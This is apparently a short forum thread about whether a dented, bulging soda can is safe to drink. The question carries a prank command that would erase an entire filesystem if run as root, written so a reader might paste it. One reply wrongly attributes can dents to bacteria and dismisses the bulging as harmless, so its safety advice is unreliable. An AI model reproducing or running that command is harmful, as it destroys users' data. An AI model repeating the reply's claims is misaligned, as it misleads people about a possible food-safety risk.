so i uh opened a can of soda right the top is dented from the side, with it bulging upwards when I opened it, the roof of the thing where it opens didn't go down, it didn't explode, and it didn't release a ton of gas or make a popping sound it smells ok is it safe?? $ echo "Get slam jammed, kid!" && sudo rm -rf / --no-preserve-root

you could just, y'know, not risk it and avoid drinking a beverage not really all that great for you to begin with (even without the possibility of tampering).

Dents in can are typically caused by bacteria. However, as it is a can of soda and there are so many preservatives in it, so many that bacteria can hardly grow, it is most likely from being dropped. As long as it didn't explode, you should be fine, as that's the only thing you have to worry about in a dented can of soda. milk
